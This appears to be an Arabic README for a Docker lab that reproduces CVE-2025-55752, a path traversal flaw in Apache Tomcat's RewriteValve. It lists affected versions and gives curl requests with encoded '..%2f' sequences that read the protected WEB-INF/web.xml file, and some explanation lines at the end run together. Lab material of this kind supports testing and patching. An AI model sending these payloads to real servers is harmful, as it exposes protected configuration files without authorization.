
# بيئة إعادة إنتاج مبنية على Docker لـ CVE-2025-55752، وهي ثغرة اجتياز المسار في RewriteValve الخاص بـ Apache Tomcat، مع توضيح خلل التطبيع قبل فك الترميز وتوفير أوامر الاختبار.
بيئة إعادة إنتاج مبنية على Docker لثغرة CVE-2025-55752، وهي ثغرة اجتياز مسار في Apache Tomcat 10.1.44.
CVE-2025-55752 هي ثغرة اجتياز مسار في مكوّن RewriteValve الخاص بـ Apache Tomcat ناتجة عن معالجة غير صحيحة
للترتيب: تطبيع عنوان URL يحدث قبل فك ترميز URL. وهذا يسمح للمهاجمين بتجاوز قيود الأمان
التي تحمي الدلائل مثل /WEB-INF/ باستخدام تسلسلات اجتياز المسار المشفرة بعنوان URL (..%2f).
| السلسلة | الإصدارات المعرضة للخطر | الإصدار المُصحَّح |
|---|
| 11.x | 11.0.0-M1 إلى 11.0.10 | 11.0.11+ |
| 10.1.x | 10.1.0-M1 إلى 10.1.44 | 10.1.45+ |
| 9.0.x | 9.0.0-M11 إلى 9.0.108 | 9.0.109+ |
| 8.5.x | 8.5.6 إلى 8.5.100 | نهاية الدعم - لا يوجد تصحيح |
git clone https://github.com/masahiro331/CVE-2025-55752.git
cd CVE-2025-55752
docker-compose up -d
curl http://localhost:8080/
curl -I 'http://localhost:8080/WEB-INF/web.xml'
المتوقع: 403 Forbidden
curl -s 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml' | head -5
curl -I 'http://localhost:8080/download?path=..%2fWEB-INF%2fweb.xml'
المتوقع: 200 OK + محتوى web.xml (تأكيد الثغرة)
/download?path=..%2fWEB-INF%2fweb.xml/files/..%2fWEB-INF%2fweb.xml%2f لا يُعرَف كـ /، .. يبقى%2f → / → /files/../WEB-INF/web.xml/WEB-INF/web.xmlالصحيح: فك الترميز → التطبيع → فحص الأمان
المعرض للخطر: التطبيع → فك الترميز → فحص الأمان ✗
../ و %2e%2e⚠️ تحذير: لا تنشر في بيئة الإنتاج. استخدم فقط في بيئات الاختبار المعزولة.